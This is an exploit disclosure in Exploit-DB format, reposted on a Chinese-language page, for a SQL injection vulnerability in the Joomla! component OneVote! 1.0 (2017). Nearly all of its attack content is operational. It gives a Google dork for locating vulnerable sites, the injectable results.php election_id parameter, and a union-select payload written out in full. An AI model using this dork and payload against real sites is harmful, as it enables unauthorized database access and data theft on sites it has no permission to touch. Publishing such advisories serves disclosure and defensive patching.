Joomla! Component OneVote! 1.0 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-02-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41470/
  • # # # # # 
    # Exploit Title: Joomla! Component OneVote! v1.0 - SQL Injection
    # Google Dork: inurl:index.php?option=com_onevote
    # Date: 27.02.2017
    # Vendor Homepage: http://advcomsys.com/
    # Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onevote/
    # Demo: http://advcomsys.com/index.php/joomla-demos/elections
    # Version: 1.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]
    # +/*!50000union*/+select+@@version-- -
    # # # # #